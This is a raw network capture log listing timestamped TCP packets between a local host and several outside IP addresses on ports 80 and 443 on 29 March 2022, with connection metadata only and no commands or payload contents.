Mar 29, 2022 06:51:30.843269110 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:30.843322039 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:30.843332052 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:30.843379974 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:30.843395948 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:30.843420029 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:30.843425989 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:30.843465090 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:30.843468904 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:30.843502045 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:30.843540907 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:30.843563080 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:30.843568087 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:30.843580008 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:30.843585968 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:30.843620062 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:30.843662024 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:30.843669891 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:30.843698978 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:30.843715906 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:30.843739033 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:30.843753099 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:30.843779087 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:30.843780994 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:30.843820095 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:30.843827963 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:30.843859911 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:30.843868017 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:30.843899012 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:30.843903065 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:30.843938112 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:30.843940020 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:30.843978882 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:30.843980074 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:30.844017029 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:30.844027042 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:30.844054937 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:30.844063997 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:30.844094992 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:30.844095945 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:30.844132900 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:30.844141006 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:30.844172955 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:30.844186068 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:30.844248056 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:30.844264984 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:30.844289064 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:30.844290972 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:30.844331980 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:31.166826010 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:31.166855097 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:31.166872025 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:31.166884899 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:31.166897058 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:31.166909933 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:31.166923046 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:31.166934967 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:31.166946888 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:31.167093992 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:31.167783976 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:31.167871952 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:31.167937040 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:31.167948008 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:31.167954922 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:31.167967081 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:31.167998075 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:31.168025017 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:31.168051958 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:31.168061972 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:31.168071032 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:31.168076038 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:31.168081045 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:31.168097019 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:31.168102980 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:31.168118000 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:31.168138027 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:31.168168068 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:31.168171883 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:31.168207884 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:31.168210983 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:31.168239117 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:31.168251991 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:31.168255091 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:31.168271065 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:31.168287039 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:31.168313026 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:31.168318033 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:31.168329954 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:31.168354988 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:31.168370008 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:31.168387890 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:31.168411016 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:31.168421030 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:31.168433905 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:31.168447018 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:31.168497086 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:31.180696964 CEST	49783	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:31.503108978 CEST	80	49783	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:34.734966993 CEST	49788	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:35.045147896 CEST	80	49788	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:35.047538042 CEST	49788	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:35.056058884 CEST	49788	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:35.567222118 CEST	80	49788	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:35.881261110 CEST	49789	443	192.168.2.7	162.0.218.244
Mar 29, 2022 06:51:35.881309986 CEST	443	49789	162.0.218.244	192.168.2.7
Mar 29, 2022 06:51:35.881407976 CEST	49789	443	192.168.2.7	162.0.218.244
Mar 29, 2022 06:51:35.923055887 CEST	80	49788	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:35.923244953 CEST	80	49788	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:35.923331022 CEST	49788	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:35.923372984 CEST	49788	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:35.934112072 CEST	49788	80	192.168.2.7	183.78.205.92
Mar 29, 2022 06:51:36.245281935 CEST	80	49788	183.78.205.92	192.168.2.7
Mar 29, 2022 06:51:36.703578949 CEST	49789	443	192.168.2.7	162.0.218.244
Mar 29, 2022 06:51:36.703623056 CEST	443	49789	162.0.218.244	192.168.2.7
Mar 29, 2022 06:51:36.759823084 CEST	443	49789	162.0.218.244	192.168.2.7
Mar 29, 2022 06:51:36.760026932 CEST	49789	443	192.168.2.7	162.0.218.244
Mar 29, 2022 06:51:36.817729950 CEST	49789	443	192.168.2.7	162.0.218.244
Mar 29, 2022 06:51:36.817766905 CEST	443	49789	162.0.218.244	192.168.2.7
Mar 29, 2022 06:51:36.818248034 CEST	443	49789	162.0.218.244	192.168.2.7
Mar 29, 2022 06:51:36.818326950 CEST	49789	443	192.168.2.7	162.0.218.244
Mar 29, 2022 06:51:36.820739985 CEST	49789	443	192.168.2.7	162.0.218.244
Mar 29, 2022 06:51:36.856570959 CEST	443	49789	162.0.218.244	192.168.2.7
Mar 29, 2022 06:51:36.856682062 CEST	443	49789	162.0.218.244	192.168.2.7
Mar 29, 2022 06:51:36.856755018 CEST	49789	443	192.168.2.7	162.0.218.244
Mar 29, 2022 06:51:36.856775999 CEST	49789	443	192.168.2.7	162.0.218.244
Mar 29, 2022 06:51:37.696933985 CEST	49789	443	192.168.2.7	162.0.218.244
Mar 29, 2022 06:51:37.696976900 CEST	443	49789	162.0.218.244	192.168.2.7
Mar 29, 2022 06:51:38.050447941 CEST	49790	443	192.168.2.7	162.0.218.244
Mar 29, 2022 06:51:38.050529003 CEST	443	49790	162.0.218.244	192.168.2.7
Mar 29, 2022 06:51:38.050648928 CEST	49790	443	192.168.2.7	162.0.218.244
Mar 29, 2022 06:51:43.424609900 CEST	49790	443	192.168.2.7	162.0.218.244
Mar 29, 2022 06:51:43.424639940 CEST	443	49790	162.0.218.244	192.168.2.7
Mar 29, 2022 06:51:43.485491991 CEST	443	49790	162.0.218.244	192.168.2.7
Mar 29, 2022 06:51:43.485682011 CEST	49790	443	192.168.2.7	162.0.218.244
Mar 29, 2022 06:51:43.539575100 CEST	49790	443	192.168.2.7	162.0.218.244
Mar 29, 2022 06:51:43.539606094 CEST	443	49790	162.0.218.244	192.168.2.7
Mar 29, 2022 06:51:43.540431023 CEST	443	49790	162.0.218.244	192.168.2.7
Mar 29, 2022 06:51:43.540509939 CEST	49790	443	192.168.2.7	162.0.218.244
Mar 29, 2022 06:51:43.649638891 CEST	49790	443	192.168.2.7	162.0.218.244
Mar 29, 2022 06:51:43.684158087 CEST	443	49790	162.0.218.244	192.168.2.7
Mar 29, 2022 06:51:43.684261084 CEST	443	49790	162.0.218.244	192.168.2.7
Mar 29, 2022 06:51:43.684305906 CEST	49790	443	192.168.2.7	162.0.218.244
Mar 29, 2022 06:51:43.684366941 CEST	49790	443	192.168.2.7	162.0.218.244
Mar 29, 2022 06:51:43.766702890 CEST	49790	443	192.168.2.7	162.0.218.244
Mar 29, 2022 06:51:43.766774893 CEST	443	49790	162.0.218.244	192.168.2.7
Mar 29, 2022 06:51:47.873513937 CEST	49791	443	192.168.2.7	162.0.218.244
Mar 29, 2022 06:51:47.873569012 CEST	443	49791	162.0.218.244	192.168.2.7
Mar 29, 2022 06:51:47.874020100 CEST	49791	443	192.168.2.7	162.0.218.244
Mar 29, 2022 06:51:48.291405916 CEST	49791	443	192.168.2.7	162.0.218.244
Mar 29, 2022 06:51:48.291455030 CEST	443	49791	162.0.218.244	192.168.2.7
Mar 29, 2022 06:51:48.348061085 CEST	443	49791	162.0.218.244	192.168.2.7
Mar 29, 2022 06:51:48.348222971 CEST	49791	443	192.168.2.7	162.0.218.244
Mar 29, 2022 06:51:48.361725092 CEST	49791	443	192.168.2.7	162.0.218.244
Mar 29, 2022 06:51:48.361756086 CEST	443	49791	162.0.218.244	192.168.2.7
Mar 29, 2022 06:51:48.362270117 CEST	443	49791	162.0.218.244	192.168.2.7
Mar 29, 2022 06:51:48.362365961 CEST	49791	443	192.168.2.7	162.0.218.244
Mar 29, 2022 06:51:48.455583096 CEST	49791	443	192.168.2.7	162.0.218.244
Mar 29, 2022 06:51:48.481208086 CEST	49792	443	192.168.2.7	149.154.167.99
Mar 29, 2022 06:51:48.481268883 CEST	443	49792	149.154.167.99	192.168.2.7
Mar 29, 2022 06:51:48.481610060 CEST	49792	443	192.168.2.7	149.154.167.99
Mar 29, 2022 06:51:48.494343996 CEST	443	49791	162.0.218.244	192.168.2.7
Mar 29, 2022 06:51:48.494431973 CEST	443	49791	162.0.218.244	192.168.2.7
Mar 29, 2022 06:51:48.494554996 CEST	49791	443	192.168.2.7	162.0.218.244
Mar 29, 2022 06:51:48.494573116 CEST	49791	443	192.168.2.7	162.0.218.244
Mar 29, 2022 06:51:48.595805883 CEST	49791	443	192.168.2.7	162.0.218.244
Mar 29, 2022 06:51:48.595858097 CEST	443	49791	162.0.218.244	192.168.2.7
Mar 29, 2022 06:51:48.745001078 CEST	49792	443	192.168.2.7	149.154.167.99
Mar 29, 2022 06:51:48.745057106 CEST	443	49792	149.154.167.99	192.168.2.7
Mar 29, 2022 06:51:48.814069033 CEST	443	49792	149.154.167.99	192.168.2.7
Mar 29, 2022 06:51:48.814218044 CEST	49792	443	192.168.2.7	149.154.167.99
Mar 29, 2022 06:51:49.328140020 CEST	49792	443	192.168.2.7	149.154.167.99
Mar 29, 2022 06:51:49.328176022 CEST	443	49792	149.154.167.99	192.168.2.7
Mar 29, 2022 06:51:49.328573942 CEST	443	49792	149.154.167.99	192.168.2.7
Mar 29, 2022 06:51:49.328650951 CEST	49792	443	192.168.2.7	149.154.167.99
Mar 29, 2022 06:51:49.332814932 CEST	49792	443	192.168.2.7	149.154.167.99
Mar 29, 2022 06:51:49.370662928 CEST	443	49792	149.154.167.99	192.168.2.7
Mar 29, 2022 06:51:49.370755911 CEST	49792	443	192.168.2.7	149.154.167.99
Mar 29, 2022 06:51:49.370835066 CEST	443	49792	149.154.167.99	192.168.2.7
Mar 29, 2022 06:51:49.370851994 CEST	443	49792	149.154.167.99	192.168.2.7
Mar 29, 2022 06:51:49.370899916 CEST	443	49792	149.154.167.99	192.168.2.7
Mar 29, 2022 06:51:49.370986938 CEST	49792	443	192.168.2.7	149.154.167.99
Mar 29, 2022 06:51:49.371016979 CEST	443	49792	149.154.167.99	192.168.2.7
Mar 29, 2022 06:51:49.371047974 CEST	443	49792	149.154.167.99	192.168.2.7
Mar 29, 2022 06:51:49.371068001 CEST	49792	443	192.168.2.7	149.154.167.99
Mar 29, 2022 06:51:49.371078968 CEST	49792	443	192.168.2.7	149.154.167.99
Mar 29, 2022 06:51:49.371124983 CEST	49792	443	192.168.2.7	149.154.167.99
Mar 29, 2022 06:51:49.375981092 CEST	49792	443	192.168.2.7	149.154.167.99
Mar 29, 2022 06:51:49.376027107 CEST	443	49792	149.154.167.99	192.168.2.7
Mar 29, 2022 06:51:49.619904995 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.649744987 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.649857998 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.650526047 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.680303097 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.860838890 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.861394882 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.862179995 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.891973972 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.892261982 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.892309904 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.892350912 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.892390013 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.892419100 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.892431974 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.892457008 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.892461061 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.892476082 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.892519951 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.892564058 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.892604113 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.892606974 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.892613888 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.892625093 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.892648935 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.894068003 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.922532082 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.922563076 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.922586918 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.922611952 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.922636032 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.922658920 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.922681093 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.922705889 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.922708988 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.922732115 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.922753096 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.922759056 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.922780037 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.922785044 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.922811031 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.922831059 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.922838926 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.922842026 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.922847033 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.922864914 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.922894001 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.922897100 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.922921896 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.922939062 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.922950983 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.922957897 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.922976971 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.923861027 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.923887014 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.923909903 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.923933029 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.923989058 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.924010038 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.952507973 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.952538967 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.952562094 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.952584028 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.952616930 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.952629089 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.952651978 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.952680111 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.952702999 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.952728033 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.952754021 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.952780008 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.952805042 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.952847958 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.952864885 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.952877045 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.952891111 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.952899933 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.952925920 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.952951908 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.952975988 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.952975035 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.953000069 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.953022957 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.953043938 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.953046083 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.953056097 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.953064919 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.953071117 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.953074932 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.953083992 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.953092098 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.953099966 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.953100920 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.953108072 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.953118086 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.953124046 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.953126907 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.953135967 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.953144073 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.953151941 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.953152895 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.953161955 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.953170061 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.953172922 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.953178883 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.953188896 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.953197956 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.953212976 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.953223944 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.953249931 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.953279972 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.953295946 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.953341961 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.953353882 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.953804970 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.953830957 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.953854084 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.953876972 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.953901052 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.953911066 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.953926086 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.953927994 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.953949928 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.953974962 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.953977108 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.953990936 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.954068899 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.954093933 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.982826948 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.982851028 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.982868910 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.982889891 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.982908010 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.982923985 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.982942104 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.982958078 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.982970953 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.982989073 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.983009100 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.983025074 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.983046055 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.983064890 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.983084917 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.983102083 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.983119965 CEST	80	49793	5.252.23.88	192.168.2.7
